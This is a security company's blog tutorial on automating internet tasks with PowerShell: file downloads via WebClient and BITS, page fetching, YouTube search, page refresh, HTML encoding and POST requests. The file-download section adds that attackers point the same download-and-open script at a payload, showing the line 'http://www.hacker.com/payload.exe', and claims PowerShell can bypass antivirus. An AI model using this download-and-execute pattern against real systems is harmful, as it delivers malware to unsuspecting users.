HOW TO USE POWERSHELL AS HANDY LIKE SHELL SCRIPT?
PowerShell is a mixture of a command line, a functional programming language, and an object-oriented programming language. PowerShell is also called as explorer’s scripting language. With built-in help, command discovery, and with access to much of the .NET Framework, it is possible to dig down through the layers. In this blog, we are going to discuss internet related tasks using PowerShell.
Since Shell script giving more freedom to Linux admins then why not PowerShell can provide it for windows admins. For example, if you are a consultant and some of the things you need to do regularly is to connect into clients Wi-Fi networks. This tasks can be once in a month, or sometimes it will be a daily task as well. Opening the internet explorer and navigating to the page, typing the credentials and submitting the request will take much time. There is some easy way to do your daily routine directly with simple PowerShell scripting. Here I am going to share some sample scripts to automate your routine tasks. My job is also to bring your notice as to how such options are used by potential attackers bypass your security implementations.
Let’s get started…
CONTENTS
Downloading Files
WebClient with Proxy Authentication Downloading with BitsTransfer
Synchronously method Asynchronously method Download Web Page Content Search and View Any Videos Refreshing Web Pages HTML Encoding and Decoding Sending POST Data via PowerShell
DOWNLOADING FILES
To automatically download files for internet, we can use .NET WebClient object. This script shares the internet connection settings with IE explorer.
$url = ‘http://www.briskinfosec.com/sample/example.pdf’ $object = New-Object Net.WebClient $localPath = “$home\Documents\example.pdf” $object.DownloadFile($url, $localPath) explorer.exe “/SELECT,$localPath” Invoke-Item -Path $localPath
Most attackers use this script to auto download their payloads. Powershell has ability to bypass antivirus as-well.
The attacker will insert his/her server addresses where the payload is placed in the URL section
$url = ‘http://www.hacker.com/payload.exe’
WEBCLIENT WITH PROXY AUTHENTICATION
If you want to use internet proxy, to access the internet with web client object, we can use a proxy in the script with default credentials to it.
function Get-WebClient { $wc = New-Object Net.WebClient $wc.UseDefaultCredentials = $true $wc.Proxy.Credentials = $wc.Credentials $wc } $url = ‘http://www.briskinfosec.com/sample/example.pdf’ $object = Get-WebClient $localPath = “$home\Documents\example.pdf” $object.DownloadFile($url, $localPath) explorer.exe “/SELECT,$localPath” Invoke-Item -Path $localPath
DOWNLOADING WITH BITSTRANSFER
BITS technology is used to download updates for windows. It can download large files, but not as fast. When the restart intercepts the download, once the system boots up it starts to download where it is left off. BITS can use to download files synchronously (while you wait) and asynchronously (in the background).
SYNCHRONOUSLY METHOD:
$url = ‘http://www.briskinfosec.com/sample/example.pdf’ $target = “$HOME\Documents\example.pdf” Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $target explorer.exe “/SELECT,$target”
Invoke-Item -Path $target
ASYNCHRONOUSLY METHOD:
$url = ‘http://powershell.com/cs/media/p/31297/download.aspx’ $target = “$HOME\Documents\PowerShell_Using_Registry.pdf” Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $target -DisplayName BriskDownload -Asynchronous
Once it is finished run this command to finalize the download
Get-BitsTransfer -Name ‘BriskDownload’ | Complete-BitsTransfer
DOWNLOAD WEB PAGE CONTENT
This script will bring the new web page content using the WebClient object.
$url = ‘http://briskinfosec.com/powershell/’
$wc = New-Object System.Net.WebClient $wc.DownloadString($url)
SEARCH AND VIEW ANY VIDEOS
PowerShell has a fantastic feature that let you search for YouTube videos for the given keyword the user mentioned and offers those videos.
In this script, we are searching for “PowerShell tutorial” from YouTube. The list opens in a grid viewed window, so you can use the full-text search at the top or sort columns until you find the video you want to give a try.
Next, click the video to select it, and then click “OK” in the lower-right corner of the grid.
PowerShell will launch your web browser and play the video. Awesome!
$keyword = “PowerShell tutorial” Invoke-RestMethod -Uri “https://gdata.youtube.com/feeds/api/videos?v=2&q=$($keyword.Replace(‘ ‘,’+’))” | Select-Object -Property Title, @{N=’Author’;E={$_.Author.Name}}, @{N=’Link’;E={$_.Content.src}}, @{N=’Updated’;E={[DateTime]$_.Updated}} | Sort-Object -Property Updated -Descending |
Out-GridView -Title “Select your ‘$Keyword’ video, then click OK to view.” -PassThru | ForEach-Object { Start-Process $_.Link }
REFRESHING WEB PAGES
Just think, we have opened some web pages in our IE explorer and we need the page to display the current information like cricket score and share market readings. Instead of manually reloading the pages, we can use this script to do it automatically for us.
Note: it will work only on Internet Explorer, and it needs to run from PowerShell console, not from ISE.
So you will be IMPORT-MODULE example.ps1 and invoke the script
function Refresh-WebPages { param( $interval = 5 # this will refresh every five seconds ) “Refreshing IE Windows every $interval seconds.” “Press any key to stop.” $shell = New-Object -ComObject Shell.Application do { ‘Refreshing ALL HTML’ $shell.Windows() | Where-Object { $_.Document.url } | ForEach-Object { $_.Refresh() } Start-Sleep -Seconds $interval } until ( [System.Console]::KeyAvailable ) [System.Console]::ReadKey($true) | Out-Null }
HTML ENCODING AND DECODING
This script is used to encode and decode the HTML content to special characters
[System.Web.HttpUtility]::HTMLEncode(‘This is a test & a good way to encode. ÄÖÜ’) [System.Web.HttpUtility]::HTMLDecode(‘This is a test & a good way to encode.ÄÖÜ’)
OUTPUT:
PS> [System.Web.HttpUtility]::HTMLEncode(‘This is a test & a good way to encode. ÄÖÜ’) This is a test & a good way to encode. ÄÖÜ PS> [System.Web.HttpUtility]::HTMLDecode(‘This is a test & a good way to encode. ÄÖÜ’) This is a test & a good way to encode. ÄÖÜ
SENDING POST DATA VIA POWERSHELL
Most of the time feedback or any votes on web pages are sent back via POST requests. You can send that informaton through PowerShell. We need to create a simple POST request with target URL and with appropriate parameter then send it
$url = “http://anyurl.com” $parameters = “voting=true&poll_id=5” # your POST parameters $http_request = New-Object -ComObject Msxml2.XMLHTTP $http_request.Open(‘POST’, $url, $false) $http_request.SetRequestHeader(“Content-type”, “application/x-www-form-urlencoded”) $http_request.SetRequestHeader(“Content-length”, $parameters.length) $http_request.SetRequestHeader(“Connection”, “close”) $http_request.Send($parameters) $http_request.StatusText
CONCLUSION
In this blog we have discussed about the internet related task which is used by the system admins where they can save their time by executing the previous discussed scripts. There are many more scripts available to automate every routine process on your daily basis.
Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization, our constructive and customized solution will help organization from serious threats against system hardening.
AUTHOR
Venkatesh C.S
SecurityEngineer
Briskinfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
No comments:
Post a Comment